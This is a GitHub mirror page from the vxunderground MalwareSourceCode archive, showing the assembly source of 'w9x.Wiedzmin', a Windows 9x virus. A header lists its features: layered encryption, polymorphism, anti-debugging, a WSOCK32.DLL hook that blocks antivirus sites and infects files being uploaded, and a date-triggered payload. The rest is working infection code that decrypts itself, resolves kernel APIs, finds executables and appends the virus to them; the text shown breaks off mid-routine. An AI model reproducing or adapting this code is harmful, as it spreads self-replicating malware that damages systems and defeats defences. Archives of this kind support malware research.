mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-07 02:45:27 +00:00
2405 lines
53 KiB
NASM
2405 lines
53 KiB
NASM
|
||
;
|
||
; W D nnn
|
||
; WW Ww o D M O Nn nn
|
||
; Ww wW i eEeE dddDD ZzzZzZ Mm m m nN nn
|
||
; wW Ww ii e E d dD Zz m M M mm ii N n n
|
||
; Ww w wW ii Eeee d dD z mm m m i n N n
|
||
; W W W W ii e d dD z m mm ii n n n
|
||
; wWw wWwW iii eEee d dD zZzZzZ mm mm ii n nn
|
||
; ddddDd mm iii n n
|
||
;
|
||
; ã(c) YuP - Deithwen Addan - Artist of Rebelionã
|
||
; ã yup@tlen.pl ã
|
||
;
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
; Ä w9x.Wiedzmin Ä
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
;
|
||
;
|
||
; ÄÄÄÄÄÄÄÄÄÄÄ
|
||
; <20>ÄDISCLAIMERÄ<52>
|
||
; ÄÄÄÄÄÄÄÄÄÄÄ
|
||
; This is a source of a virus, only source the compiled version
|
||
; cannot leave your computer! Author is NOT RESPONSIBLE FOR ANY
|
||
; ACTIONS WITH THIS CODE!
|
||
;
|
||
;
|
||
;
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
; <20>Ä The name Ä<>
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
;
|
||
; The name 'Wiedzmin' was stolen from Andrzej Sapkowski saga "Wiedzmin".
|
||
; (sapkowski.pl,sapkowski.cz) - someone said that he is another
|
||
; Tolkien (in my opinion this book is even better then Tolkienz
|
||
; "Lord of the Rings").
|
||
; Wiedzmin was a some kind of mutant (only few kids from 10 can survive
|
||
; wiedzmin test). As a mutant he was very fast, he was master of fencig,
|
||
; he can see at night, and he of course can make magic signs.
|
||
; Blah ...
|
||
; Next he went, and travel around the world (he was killing monsterz for money).
|
||
; In his journey he met new fantasic characters like Regis (vapire),
|
||
; Milva (hunter), Jaskier (bard), Yennefer (witch) , Ciri (child of destinty)
|
||
; ...
|
||
;
|
||
; The book is realy FANTASTIC! Full of adventures, fight, sex (X-D),
|
||
; blood, swearwords, and much much more! I realy advice you to READ IT!
|
||
; (check translationz for your language: www.sapkowski.pl).
|
||
; If you like fantasy you CAN'T miss IT!
|
||
;
|
||
;
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
; <20>Ä Music Ä<>
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
;
|
||
; I'd like to thx some kewl music groups in range of rock-hiphop:
|
||
; Outsidez: Polish groupz:
|
||
; æDeep Purple æMolesta
|
||
; æIron Maiden æFenomen
|
||
; æLinkin Park æZipera
|
||
; æRage Against the Machine æGrammatik
|
||
; æKoRn æEldo
|
||
; æLimp Bizkit æKaliber 44
|
||
;
|
||
; I'm a weird person ;]
|
||
;
|
||
;
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
; <20>Ä Greetz Ä<>
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
;
|
||
; Greetz go to:
|
||
; æFriendz from city:
|
||
; ŸYoo (:])
|
||
; ŸMisiek (dzienx za plyty stary)
|
||
; ŸKlosina (nie rzucaj nozami)
|
||
; ŸStra¿ Miejska (nie trzymamy nog na lawkach :p)
|
||
; ŸI dla reszty ludkuf, nie wymienialem was bo i tak
|
||
; nigdy tego nie przeczytacie.
|
||
;
|
||
; æGuyz from Undernet:
|
||
; ŸToro (busy today?)
|
||
; ŸSlageHammer (helo tester ;D)
|
||
; ŸSpanska (BloodHound.W32.WSWORM ;[)
|
||
; ¿BFF70000h (lagz lagz lagz)
|
||
;
|
||
; æGuyz from irc.pl:
|
||
; ŸBlaze (stuk puk)
|
||
; ŸDetergent (walek)
|
||
; ŸShmastah (judeIRC ;])
|
||
; ŸAjron (ten nie prawdziwy :P)
|
||
; ŸAamf-girl (gimnazjalistka ;P)
|
||
; ŸWizja (dolly ma reumatyzm czy jakos tak ;>)
|
||
; ŸPafko (dragonball rulez!)
|
||
; ŸCrash (why you? ;P)
|
||
;
|
||
;
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
; <20>Ä Briefing Ä<>
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
;
|
||
; Virus name : w9x.Wiedzmin
|
||
; Virus version : 1.0
|
||
; Virus author : Lord YuP - Deithwen Addan
|
||
; Release date : 6.02.02+8.02.02 i forgot to install SEH, he he
|
||
; Virus type : PE infector and WSOCK32.DLL hooker
|
||
; Target Systems : win95<nt>, win98<nt>, winME<t>
|
||
; †[nt] - not tested (should work, if not fuck it!)
|
||
; †[t] - tested
|
||
;
|
||
;
|
||
; Encryption : 3 LAYERS CRYPTED BY RANDOM NUMBER!
|
||
; † 1 - cryptz main virus body †
|
||
; † 2 - cryptz host body †
|
||
; † 3 - cryptz virus data †
|
||
;
|
||
; Every layer is crypted by another key.
|
||
;
|
||
; Virus helper : Virus when found section called different
|
||
; then ".text" or "CODE" (EIP must point to
|
||
; it) it is gonna to crypt all file body
|
||
; and put only decryptor into last section.
|
||
; The main body (with other virus probably)
|
||
; is crypted by random key. EIP points to
|
||
; decryptor.
|
||
;
|
||
;
|
||
;
|
||
; Polymorphic : Yep random key crypting, adding
|
||
; 90h<NOP> garbage in the range
|
||
; of 0-255.
|
||
;
|
||
;
|
||
; AntiAV : Virus wouldn't infect filez
|
||
; with 'a','A','E','e','v','V'
|
||
; at start.
|
||
;
|
||
;
|
||
; AntiDEBUG : Yep, using win9x Softice detection,
|
||
; and IsDebuggerPresent API. When
|
||
; sice is found it shows message in
|
||
; debbuger and exec int 19h !
|
||
; Other debbugers like td32, SoftSnoop
|
||
; end so on = int 19h!
|
||
;
|
||
;
|
||
; WSOCK32 hooker : Virus infect wsock32.dll replacing the
|
||
; send, connect function addressez.
|
||
; After reboot (wininit.ini ;P) functionz
|
||
; will be hooked. User will never connect
|
||
; to AV sitez (error: host not found),
|
||
; and when user will try to put a file in
|
||
; the FTP account, virus will infect it on
|
||
; fly.
|
||
;
|
||
;
|
||
;
|
||
; Infection procez : Virus infect 7 filez in the local
|
||
; directory and 7 filez in the windowz
|
||
; directory. Virus is going to apend
|
||
; itself to the last section. The section
|
||
; is increased. EIP points to it.
|
||
;
|
||
;
|
||
;
|
||
; Payload : On 22.06 or 22.12 every run it gonna
|
||
; print color string in the infinite
|
||
; loop. The string will be VISIBLE
|
||
; everywhere - virus grabz active
|
||
; window HDC!
|
||
;
|
||
;
|
||
;
|
||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WIEDZMIN.ASM]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
.386
|
||
.model flat
|
||
jumps
|
||
locals
|
||
|
||
|
||
|
||
|
||
|
||
extrn ExitProcess:PROC
|
||
extrn MessageBoxA:PROC
|
||
|
||
|
||
|
||
FILETIME STRUC
|
||
dwLowDateTime dd ?
|
||
dwHighDateTime dd ?
|
||
FILETIME ends
|
||
|
||
|
||
|
||
WIN32_FIND_DATA struc ;FIND DATA
|
||
dwFileAttributes dd 0
|
||
dwLowDateTime0 dd ?
|
||
dwHigDateTime0 dd ?
|
||
dwLowDateTime1 dd ?
|
||
dwHigDateTime1 dd ?
|
||
dwLowDateTime2 dd ?
|
||
dwHigDateTime2 dd ?
|
||
nFileSizeHigh dd ?
|
||
nFileSizeLow dd ?
|
||
dwReserved dd 0,0
|
||
cFileName db 260 dup(0)
|
||
cAlternateFilename db 14 dup(0)
|
||
db 2 dup(0)
|
||
WIN32_FIND_DATA ends
|
||
|
||
hooksize equ hook_end-start_h
|
||
sendh equ (offset hooked_send-offset start_h)
|
||
connecth equ (offset hooked_connect-offset start_h)
|
||
|
||
|
||
|
||
|
||
|
||
vvsize equ HeapEnd-HeapStart
|
||
virussize equ VirusEnd-v_start
|
||
allsize equ virussize
|
||
TO_DE equ @loop_decryptt-@to_this
|
||
helper equ @helper_end-@uncrypt
|
||
|
||
|
||
virussizee macro
|
||
db virussize/10000 mod 10 + "0"
|
||
db virussize/01000 mod 10 + "0"
|
||
db virussize/00100 mod 10 + "0"
|
||
db virussize/00010 mod 10 + "0"
|
||
db virussize/00001 mod 10 + "0"
|
||
endm
|
||
|
||
|
||
|
||
|
||
.DATA
|
||
|
||
|
||
db ?
|
||
|
||
|
||
.CODE
|
||
v_start:
|
||
pushad
|
||
pushfd
|
||
|
||
call @delta
|
||
@delta:
|
||
pop ebp ;ebp contains address of @delta right now in
|
||
sub ebp,offset @delta ;memory -> we must sub the linking @delta val
|
||
|
||
cmp ebp,0
|
||
je @_KERNEL
|
||
|
||
|
||
@main_decryptor:
|
||
lea edx,[ebp+offset @to_this]
|
||
mov eax,[ebp+key_main]
|
||
mov ecx,TO_DE
|
||
|
||
|
||
@loop_decrypt:
|
||
xor byte ptr [edx],al
|
||
inc edx
|
||
loop @loop_decrypt
|
||
cmp edi,'!PUY'
|
||
jne @to_this
|
||
ret
|
||
|
||
|
||
|
||
@to_this:
|
||
lea edi,[ebp+offset APIList]
|
||
lea esi,[ebp+offset APIList]
|
||
call @UN_CRYPT_BYTEZ
|
||
|
||
lea edi,[ebp+offset TO_CRYPT_DATA]
|
||
lea esi,[ebp+offset TO_CRYPT_DATA]
|
||
call @UN_CRYPT_BYTEZ
|
||
|
||
|
||
@_KERNEL:
|
||
lea eax, [ebp+fault] ; Setup a SEH frame
|
||
push eax
|
||
push dword ptr fs:[0]
|
||
mov fs:[0], esp
|
||
|
||
mov eax,0BFF70000h ;kerneloz w95
|
||
cmp word ptr [eax],'ZM'
|
||
je _GOT_KERNEL
|
||
;NT moze pozniej :p
|
||
|
||
|
||
|
||
mov eax,0BFF60000h ;ladujemy kernela ;) winME ;)
|
||
cmp word ptr [eax],'ZM' ;check is it a exe file
|
||
je _GOT_KERNEL
|
||
|
||
jmp @EXIT
|
||
|
||
|
||
_GOT_KERNEL:
|
||
mov dword ptr [ebp+capis],5h
|
||
mov dword ptr [ebp+Kernel],eax
|
||
|
||
|
||
@go_export:
|
||
|
||
mov dword ptr [ebp+NON],000000h
|
||
mov dword ptr [ebp + AOF],000000h
|
||
mov dword ptr [ebp + AON],000000h
|
||
mov dword ptr [ebp + AOO],000000h
|
||
|
||
mov edx,eax
|
||
mov ebx,edx
|
||
|
||
|
||
mov edi, [eax + 03ch] ;a valid PE ?
|
||
add edx, edi
|
||
cmp dword ptr [edx],'EP'
|
||
jne @EXIT
|
||
|
||
|
||
|
||
mov edx,[edx + 078h] ;export table
|
||
add edx,eax ;mamy w edx -> export table
|
||
|
||
|
||
|
||
|
||
mov esi,[edx + 018h]
|
||
mov dword ptr [ebp + NON],esi
|
||
|
||
|
||
mov esi,[edx+1Ch]
|
||
mov dword ptr [ebp + AOF],esi
|
||
add dword ptr [ebp + AOF],eax
|
||
|
||
mov esi,[edx+20h]
|
||
mov dword ptr [ebp + AON],esi
|
||
add dword ptr [ebp + AON],eax
|
||
|
||
mov esi,[edx+24h]
|
||
mov dword ptr [ebp + AOO],esi
|
||
add dword ptr [ebp + AOO],eax
|
||
|
||
|
||
|
||
|
||
|
||
@export_read:
|
||
mov esi,dword ptr [ebp + AON]
|
||
mov [ebp+offset IndexA],esi ;save into naming index
|
||
mov esi,dword ptr [esi]
|
||
add esi,eax
|
||
|
||
xor ebx,ebx
|
||
|
||
|
||
@__GPA:
|
||
|
||
|
||
cmp dword ptr [ebp+capis],5h
|
||
je @zwykle
|
||
|
||
|
||
lea edi,[ebp+offset A1]
|
||
mov ecx,A1s
|
||
|
||
|
||
|
||
cmp dword ptr [ebp+capis],1
|
||
jne @porownaj
|
||
|
||
lea edi,[ebp+offset A2]
|
||
mov ecx,A2s
|
||
jmp @porownaj
|
||
|
||
@zwykle:
|
||
lea edi,[ebp + offset APIS] ;mam offset zmiennej
|
||
|
||
|
||
|
||
@GET_GPA:
|
||
mov ecx,APIS_SIZE ;size api
|
||
|
||
|
||
@porownaj:
|
||
rep cmpsb ;scan
|
||
je found ;if equal calculate function address
|
||
|
||
|
||
Scan_dalej:
|
||
add dword ptr [ebp + offset IndexA],4
|
||
mov esi,[ebp + offset IndexA]
|
||
mov esi,[esi]
|
||
add esi,eax
|
||
|
||
cmp dword ptr [ebp+offset NON],ebx
|
||
je @EXIT
|
||
inc ebx
|
||
cmp dword ptr [ebp+offset NON],ebx
|
||
je @EXIT
|
||
|
||
jmp @__GPA
|
||
|
||
found:
|
||
mov eax,ebx ;mamy GPA !!!
|
||
|
||
mov ecx,edi
|
||
inc ecx
|
||
push ecx ;na stos ;P
|
||
|
||
mov eax,ebx ;EAX=>counter
|
||
mov ecx,2
|
||
mul ecx ;mnozymy EAX*2
|
||
pop ecx ;zdejmujemy ze stosu ECX
|
||
|
||
mov esi,[ebp + AOO]
|
||
add esi,eax
|
||
xor eax,eax
|
||
|
||
|
||
mov ax,word ptr [esi]
|
||
mov ecx,4
|
||
mul ecx
|
||
|
||
|
||
|
||
|
||
cmp dword ptr [ebp+go_wsock],1
|
||
jne @skip_it_urgh
|
||
|
||
mov esi,[ebp + AOF]
|
||
add esi,eax
|
||
mov eax,[esi]
|
||
|
||
|
||
|
||
|
||
cmp dword ptr [ebp+capis],1
|
||
je @make_1
|
||
|
||
;mov ebx,dword ptr [ebp+wsock_hh]
|
||
;mov dword ptr [ebp+a_send],eax
|
||
;add dword ptr [ebp+a_send],ebx
|
||
;mov eax,dword ptr [ebp+a_send]
|
||
|
||
mov ebx,sendh
|
||
mov edx,dword ptr [ebp+moj_address] ;tricky shit ;]
|
||
add edx,ebx
|
||
jmp make_real
|
||
|
||
|
||
@make_1:
|
||
mov ebx,connecth
|
||
mov edx,dword ptr [ebp+moj_address] ;tricky shit ;]
|
||
add edx,ebx
|
||
|
||
|
||
|
||
make_real:
|
||
|
||
|
||
mov [esi],edx
|
||
|
||
inc dword ptr [ebp+capis]
|
||
cmp dword ptr [ebp+capis],2
|
||
je @go_out_now
|
||
|
||
mov eax,dword ptr [ebp+wsock_h]
|
||
jmp @go_export
|
||
|
||
@go_out_now: ret
|
||
|
||
|
||
@skip_it_urgh:
|
||
mov esi,[ebp + AOF]
|
||
add esi,eax
|
||
mov edi,dword ptr [esi]
|
||
add edi,[ebp+offset Kernel]
|
||
mov eax,edi
|
||
mov dword ptr [ebp+_GPA],eax
|
||
|
||
|
||
|
||
|
||
@GET_APIS: ;API Search
|
||
xor esi,esi
|
||
lea esi,[ebp+offset APIList]
|
||
lea edi,[ebp+offset _FindFirstFileA]
|
||
;mamy d wordy czyli skok co 4 bajty
|
||
;stosd -> z EAX do EDI
|
||
|
||
|
||
|
||
@go_table:
|
||
push esi
|
||
push dword ptr [ebp+offset Kernel]
|
||
call dword ptr [ebp+offset _GPA]
|
||
stosd
|
||
|
||
@next_byte:
|
||
inc esi
|
||
cmp byte ptr [esi],00h
|
||
jne @next_byte
|
||
|
||
|
||
inc esi
|
||
cmp byte ptr [esi],07h
|
||
jne @go_table
|
||
|
||
mov eax,dword ptr [ebp+_GetCurrentDirectoryA]
|
||
mov dword ptr [ebp+gcd],eax
|
||
mov eax,dword ptr [ebp+_WinExec]
|
||
mov dword ptr [ebp+wex],eax
|
||
|
||
lea eax,[ebp+offset wsock]
|
||
inc eax
|
||
push eax
|
||
call dword ptr [ebp+_LoadLibraryA]
|
||
mov dword ptr [ebp+wsock_hh],eax
|
||
|
||
|
||
lea ecx,[ebp+offset sle]
|
||
push ecx
|
||
push eax
|
||
call dword ptr [ebp+offset _GPA]
|
||
mov dword ptr [ebp+_WSASetLastError],eax
|
||
|
||
|
||
lea ecx,[ebp+offset A1]
|
||
push ecx
|
||
push dword ptr [ebp+wsock_hh]
|
||
call dword ptr [ebp+offset _GPA]
|
||
mov dword ptr [ebp+a_send],eax
|
||
|
||
|
||
lea ecx,[ebp+offset A2]
|
||
push ecx
|
||
push dword ptr [ebp+wsock_hh]
|
||
call dword ptr [ebp+offset _GPA]
|
||
mov dword ptr [ebp+a_connect],eax
|
||
|
||
|
||
|
||
push 4h ; PAGE_READWRITE
|
||
push 1000h ; MEM_COMMIT
|
||
push 1000 ; size of buffer
|
||
push 0 ; lpAddress
|
||
call dword ptr [ebp+_VirtualAlloc] ; Alloc IT!
|
||
mov dword ptr [ebp+vbuf],eax
|
||
|
||
|
||
;********************************DEBUG TRAP******************************************************
|
||
;call @debug_trap
|
||
;************************************************************************************************
|
||
call @wsockz
|
||
mov dword ptr [ebp+go_wsock],0
|
||
|
||
lea eax,[ebp+SYSTEM_TIME]
|
||
push eax
|
||
call dword ptr [ebp+_GetSystemTime]
|
||
|
||
cmp word ptr [ebp+wMonth],6 ;22.06 Midaëte
|
||
jne try_
|
||
cmp word ptr [ebp+wDay],22
|
||
jne try_
|
||
call make_it_real
|
||
|
||
|
||
try_:
|
||
cmp word ptr [ebp+wMonth],12 ;22.12 Midinvaerne
|
||
jne cya_folx
|
||
cmp word ptr [ebp+wDay],22
|
||
jne cya_folx
|
||
call make_it_real
|
||
|
||
|
||
cya_folx:
|
||
|
||
|
||
|
||
|
||
call @GGEN_KEY
|
||
lea edi,[ebp+offset APIList]
|
||
lea esi,[ebp+offset APIList]
|
||
call @CRYPT_BYTEZ
|
||
|
||
lea edi,[ebp+offset TO_CRYPT_DATA]
|
||
lea esi,[ebp+offset TO_CRYPT_DATA]
|
||
call @CRYPT_BYTEZ
|
||
|
||
|
||
|
||
_done:
|
||
lea edi,[ebp+finddata.cFileName]
|
||
call dword ptr [ebp+_GetCommandLineA]
|
||
mov esi,eax
|
||
|
||
xor ebx,ebx
|
||
_skip_space:
|
||
lodsb
|
||
cmp al,0
|
||
je @GetWDir
|
||
cmp al,' '
|
||
je _ave_it
|
||
jmp _skip_space
|
||
|
||
|
||
_ave_it:
|
||
lodsb
|
||
inc ebx
|
||
cmp al,0
|
||
je @infect_shit
|
||
stosb
|
||
jmp _ave_it
|
||
|
||
@infect_shit:
|
||
cmp ebx,4
|
||
jl @GetWDir
|
||
lea esi,[ebp+offset finddata.cFileName]
|
||
add esi,ebx
|
||
sub esi,5
|
||
lodsb
|
||
cmp al,'.'
|
||
je yep_it
|
||
jmp @GetWDir
|
||
|
||
|
||
yep_it:
|
||
|
||
push dword ptr [ebp+key_main]
|
||
push dword ptr [ebp+key_next]
|
||
push dword ptr [ebp+e_bytes]
|
||
push dword ptr [ebp+e_where]
|
||
push dword ptr [ebp+hosteip]
|
||
push dword ptr [ebp+imagebase]
|
||
call @infect
|
||
pop dword ptr [ebp+imagebase]
|
||
pop dword ptr [ebp+hosteip]
|
||
pop dword ptr [ebp+e_where]
|
||
pop dword ptr [ebp+e_bytes]
|
||
pop dword ptr [ebp+key_next]
|
||
pop dword ptr [ebp+key_main]
|
||
|
||
push 0h
|
||
call dword ptr [ebp+_ExitProcess]
|
||
|
||
|
||
@GetWDir:
|
||
lea eax,[ebp+offset winDIR]
|
||
push 260
|
||
push eax
|
||
call dword ptr [ebp+_GetWindowsDirectoryA]
|
||
|
||
;now local dir
|
||
lea eax,[ebp+offset oldDIR]
|
||
push eax
|
||
push 560
|
||
call dword ptr [ebp+_GetCurrentDirectoryA]
|
||
|
||
|
||
mov dword ptr [ebp+was_win],0000000h
|
||
@Find1st:
|
||
mov dword ptr [ebp+ic],0000000h
|
||
lea eax,[ebp+offset finddata]
|
||
push eax
|
||
lea eax,[ebp+offset marker]
|
||
push eax
|
||
call dword ptr [ebp+_FindFirstFileA]
|
||
mov dword ptr [ebp+sHnd],eax
|
||
inc eax
|
||
jz @d_dalej
|
||
|
||
@workk:
|
||
push dword ptr [ebp+key_main]
|
||
push dword ptr [ebp+key_next]
|
||
push dword ptr [ebp+e_bytes]
|
||
push dword ptr [ebp+e_where]
|
||
push dword ptr [ebp+hosteip]
|
||
push dword ptr [ebp+imagebase]
|
||
call @infect
|
||
pop dword ptr [ebp+imagebase]
|
||
pop dword ptr [ebp+hosteip]
|
||
pop dword ptr [ebp+e_where]
|
||
pop dword ptr [ebp+e_bytes]
|
||
pop dword ptr [ebp+key_next]
|
||
pop dword ptr [ebp+key_main]
|
||
|
||
|
||
@@Fnext:
|
||
lea eax,[ebp+offset finddata]
|
||
push eax
|
||
push dword ptr [ebp+offset sHnd]
|
||
call dword ptr [ebp+_FindNextFileA]
|
||
cmp eax,0
|
||
je @d_dalej
|
||
|
||
push dword ptr [ebp+key_main]
|
||
push dword ptr [ebp+key_next]
|
||
push dword ptr [ebp+e_bytes]
|
||
push dword ptr [ebp+e_where]
|
||
push dword ptr [ebp+hosteip]
|
||
push dword ptr [ebp+imagebase]
|
||
call @infect
|
||
pop dword ptr [ebp+imagebase]
|
||
pop dword ptr [ebp+hosteip]
|
||
pop dword ptr [ebp+e_where]
|
||
pop dword ptr [ebp+e_bytes]
|
||
pop dword ptr [ebp+key_next]
|
||
pop dword ptr [ebp+key_main]
|
||
|
||
|
||
cmp dword ptr [ebp+ic],7
|
||
jne @@Fnext
|
||
|
||
@d_dalej:
|
||
cmp dword ptr [ebp+was_win],0
|
||
jne @dalej
|
||
|
||
_WinINF:
|
||
cmp dword ptr [ebp+was_win],0
|
||
jne _stepnext
|
||
|
||
|
||
|
||
lea eax,[ebp+offset winDIR]
|
||
push eax
|
||
call dword ptr [ebp+_SetCurrentDirectoryA]
|
||
|
||
mov dword ptr [ebp+ic],0000000h
|
||
mov dword ptr [ebp+was_win],1
|
||
|
||
|
||
|
||
push dword ptr [ebp+sHnd]
|
||
call dword ptr [ebp+_FindClose]
|
||
|
||
|
||
|
||
_stepnext:
|
||
cmp dword ptr [ebp+ic],7
|
||
jne @Find1st
|
||
|
||
|
||
@dalej:
|
||
lea eax,[ebp+offset oldDIR]
|
||
push eax
|
||
call dword ptr [ebp+_SetCurrentDirectoryA]
|
||
jmp @EXIT
|
||
|
||
fault:
|
||
mov esp, [esp+8]
|
||
|
||
@EXIT:
|
||
|
||
push 4000h
|
||
push 1000
|
||
push dword ptr [ebp+vbuf]
|
||
call dword ptr [ebp+_VirtualFree]
|
||
|
||
pop dword ptr fs:[0]
|
||
add esp, 4
|
||
|
||
|
||
cmp ebp,0 ;first GeneratioN?
|
||
jne _ETH ;tak to wyjc ;]
|
||
call fakehost
|
||
|
||
|
||
_ETH:
|
||
|
||
call @uncrypt
|
||
|
||
|
||
popfd
|
||
popad
|
||
call @gd
|
||
@gd: pop ebp
|
||
sub ebp,offset @gd
|
||
|
||
mov eax,dword ptr [ebp+hosteip]
|
||
add eax,dword ptr [ebp+imagebase]
|
||
jmp eax
|
||
|
||
Kernel dd 0
|
||
|
||
|
||
|
||
|
||
;<##############################################################################################>
|
||
;------------------------------------------------------------------------------------------------
|
||
;************************************************************************************************
|
||
;INFECT EM GLOWZ !!!!
|
||
;************************************************************************************************
|
||
;------------------------------------------------------------------------------------------------
|
||
;<##############################################################################################>
|
||
|
||
@infect:
|
||
call @bad_name
|
||
cmp edi,1
|
||
jne _continue
|
||
ret
|
||
|
||
@infect0:
|
||
_continue:
|
||
lea esi,[ebp+offset finddata.cFileName]
|
||
|
||
push esi
|
||
call dword ptr [ebp+_GetFileAttributesA]
|
||
mov dword ptr [ebp+fileAtrib],eax
|
||
inc eax
|
||
jz _Out
|
||
|
||
lea eax,[ebp+F1]
|
||
push eax
|
||
lea eax,[ebp+F2]
|
||
push eax
|
||
lea eax,[ebp+F3]
|
||
push eax
|
||
push dword ptr [ebp+fHnd]
|
||
call dword ptr [ebp+_GetFileTime]
|
||
|
||
|
||
push 00000080h
|
||
push esi
|
||
call dword ptr [_SetFileAttributesA+ebp] ; clean file
|
||
cmp eax,0
|
||
je _Out
|
||
|
||
;mov ecx,dword ptr [ebp+finddata.nFileSizeLow]
|
||
;mov [ebp+offset memory],ecx
|
||
|
||
|
||
;Ble otfieramy zeby miec handle
|
||
xor eax,eax
|
||
lea esi,[ebp+offset finddata.cFileName]
|
||
push eax
|
||
push 00000080h
|
||
push 00000003h
|
||
push eax
|
||
push eax
|
||
push 80000000h OR 40000000h
|
||
push esi
|
||
call dword ptr [ebp+_CreateFileA]
|
||
mov edi,eax ;w edi handle
|
||
inc eax
|
||
jz _Out
|
||
dec eax
|
||
mov dword ptr [ebp+offset fileHandle],eax
|
||
|
||
|
||
|
||
_Oblicz:
|
||
push 0
|
||
push dword ptr [ebp+offset fileHandle]
|
||
call dword ptr [ebp+_GetFileSize]
|
||
mov dword ptr [ebp+fSize],eax
|
||
inc eax
|
||
jz _Out2
|
||
dec eax
|
||
mov dword ptr [ebp+finddata.nFileSizeLow],eax
|
||
|
||
mov ecx,dword ptr [ebp+fSize]
|
||
call MapF
|
||
|
||
|
||
mov ecx,dword ptr [ebp+fSize]
|
||
call VMapF
|
||
;w esi mamy maping tak jak z kernelem
|
||
|
||
_Check_PE:
|
||
cmp word ptr [esi],'ZM'
|
||
jne _Out3
|
||
|
||
mov ecx,[esi+3ch]
|
||
cmp dword ptr [esi+ecx],'EP'
|
||
jne _Out3
|
||
|
||
|
||
add esi,ecx ;ESI => PE HEADER
|
||
mov edi,esi
|
||
|
||
|
||
_Saving:
|
||
mov dword ptr [ebp+header],esi
|
||
mov ecx,[esi+28h]
|
||
mov dword ptr [ebp+hosteip],ecx
|
||
mov ecx,[esi+3ch]
|
||
mov dword ptr [ebp+align],ecx
|
||
mov ecx,[esi+34h]
|
||
mov dword ptr [ebp+imagebase],ecx
|
||
mov ecx,[esi+38h] ;get section align value
|
||
mov [ebp + _secAlign],ecx ;and save it
|
||
|
||
|
||
|
||
_Infecto0:
|
||
cmp dword ptr [esi+4ch],"deiW"
|
||
jz _No_infect
|
||
|
||
|
||
|
||
push dword ptr [esi+3Ch]
|
||
|
||
|
||
|
||
;***********************************************************************************************
|
||
|
||
mov eax,[ebp+offset fMapReal]
|
||
push eax
|
||
mov eax, [ebp+_UnmapViewOfFile]
|
||
call eax
|
||
|
||
push dword ptr [ebp+fHndMap]
|
||
call dword ptr [ebp+_CloseHandle]
|
||
|
||
|
||
;mov eax,dword ptr [ebp+go_wsock]
|
||
|
||
|
||
|
||
mov eax,dword ptr [ebp+fSize] ; And Map all again.
|
||
cmp dword ptr [ebp+go_wsock],1
|
||
je @dodaj
|
||
add eax,virussize+vvsize
|
||
;add eax,vvsize
|
||
jmp @nextt
|
||
|
||
@dodaj:add eax,hooksize
|
||
|
||
|
||
|
||
|
||
@nextt:
|
||
pop ecx
|
||
call Align_
|
||
mov dword ptr [ebp+memory],eax
|
||
|
||
|
||
mov ecx,eax
|
||
call MapF
|
||
|
||
mov ecx,dword ptr [ebp+memory]
|
||
call VMapF
|
||
|
||
cmp dword ptr [ebp+go_wsock],1
|
||
je @0dal
|
||
call @crypt_host
|
||
cmp dword ptr [ebp+help_virus],1
|
||
je _God
|
||
|
||
|
||
@0dal:
|
||
mov esi,[eax+3ch]
|
||
add esi,eax ;ESI => PE HEADER
|
||
mov edi,esi
|
||
|
||
|
||
;************************************************************************************************
|
||
|
||
inc dword ptr [ebp+ic]
|
||
|
||
xor eax,eax
|
||
mov ax,[esi + 06h] ;load number of sections
|
||
mov ecx,28h ;28 bytes for each section header
|
||
dec eax ;seeking for last,...
|
||
mul ecx ;and mul it
|
||
add esi,eax ; Normalize
|
||
add esi,78h ; Ptr to dir table
|
||
mov edx,[edi+74h] ; EDX = n§ of dir entries
|
||
shl edx,3 ; EDX = EDX*8
|
||
add esi,edx ; ESI = Ptr to last section
|
||
|
||
|
||
mov edx,[esi+10h] ; EDX = SizeOfRawData
|
||
mov ebx,edx ; EBX = EDX
|
||
add edx,[esi+14h] ; EDX = EDX+PointerToRawData
|
||
|
||
push edx ; Preserve EDX
|
||
|
||
mov eax,ebx ; EAX = EBX
|
||
add eax,[esi+0Ch] ; EAX = EAX+VA Address
|
||
; EAX = New EIP
|
||
;mov [edi+28h],eax ; Change the new EIP
|
||
mov dword ptr [ebp+NewEIP],eax ; Also store it
|
||
|
||
cmp dword ptr [ebp+go_wsock],1
|
||
je @infect_then
|
||
|
||
|
||
mov eax,dword ptr [ebp+NewEIP]
|
||
mov [edi+28h],eax
|
||
|
||
|
||
@infect_then:
|
||
mov eax,[esi+10h] ; EAX = new SizeOfRawData
|
||
cmp dword ptr [ebp+go_wsock],1
|
||
je @dallejj
|
||
add eax,vvsize+virussize ; EAX = EAX+VirusSize
|
||
jmp @nexttt
|
||
|
||
@dallejj: add eax,hooksize
|
||
@nexttt:
|
||
mov ecx,[edi+3Ch] ; ECX = FileAlignment
|
||
call Align_ ; Align!
|
||
|
||
mov [esi+10h],eax ; New SizeOfRawData
|
||
|
||
mov [esi+08h],eax ; New VirtualSize
|
||
|
||
pop edx ; EDX = Raw pointer to the
|
||
; end of section
|
||
cmp dword ptr [ebp+go_wsock],1
|
||
je @skip_thiss
|
||
|
||
mov eax,[esi+10h] ; EAX = New SizeOfRawData
|
||
add eax,[esi+0Ch] ; EAX = EAX+VirtualAddress
|
||
mov [edi+50h],eax ; EAX = New SizeOfImage
|
||
|
||
@skip_thiss:
|
||
or dword ptr [esi+24h],0A0000020h
|
||
|
||
mov dword ptr [edi+4ch],"deiW" ;Wiedzmin here ;)
|
||
|
||
lea esi,[ebp+v_start] ; ESI = Ptr to virus_start
|
||
xchg edi,edx ; EDI = Raw ptr after last
|
||
mov dword ptr [ebp+moj_address],edi
|
||
|
||
; section
|
||
add edi,dword ptr [ebp+fMapReal] ;EDI = Normalized ptr
|
||
mov ecx,virussize ;ECX = Size to copy
|
||
